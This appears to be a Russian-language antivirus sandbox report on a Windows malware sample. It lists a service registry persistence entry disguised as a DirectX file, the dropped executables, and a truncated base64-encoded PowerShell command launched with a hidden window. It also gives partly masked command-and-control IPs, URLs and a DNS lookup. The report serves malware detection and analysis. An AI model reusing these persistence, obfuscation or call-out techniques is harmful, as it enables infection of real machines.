Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\d3dx9_27] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\d3dx9_27] 'ImagePath' = '"%WINDIR%\SysWOW64\KBDEST\d3dx9_27.exe"'
- 'd3dx9_27' "%WINDIR%\SysWOW64\KBDEST\d3dx9_27.exe"
- 'd3dx9_27' %WINDIR%\SysWOW64\KBDEST\d3dx9_27.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMAdgAgAEcAbQBiACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADUAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADMAfQAiAC0ARgAnAFQAJwAsACcAUwBZAHMAdABFACcALAAnAGUAQwAnACwAJwBvAFIAWQAnACwAJw...
- %HOMEPATH%\ssu_x6q\oqs13h6\o1zaymn0.exe
- %HOMEPATH%\ssu_x6q\oqs13h6\o1zaymn0.exe в %WINDIR%\syswow64\kbdest\d3dx9_27.exe
- '19#.#45.25.228':80
- '98.##3.204.12':443
- '59.##8.253.194':8080
- '17#.#12.197.71':8080
- '87.##6.46.107':8080
- http://98.###.204.12:443/Xoz6yMstMKR/To98PeJLWBCWuiPsO/wHZfWAA0LDXOZRWCAX/M4Jzz/ via 98.##3.204.12
- http://59.###.253.194:8080/oQUci6m8DwIi/trfIQA9/Y3PJOyTfivZ/ via 59.##8.253.194
- DNS ASK ju####gphones.com
- '%HOMEPATH%\ssu_x6q\oqs13h6\o1zaymn0.exe'
- '%WINDIR%\syswow64\kbdest\d3dx9_27.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMAdgAgAEcAbQBiACAAIAAoAFsAVABZAFAARQBdACgAIgB7ADEAfQB7ADUAfQB7ADQAfQB7ADIAfQB7ADAAfQB7ADMAfQAiAC0ARgAnAFQAJwAsACcAUwBZAHMAdABFACcALAAnAGUAQwAnACwAJwBvAFIAWQAnACwAJw...' (со скрытым окном)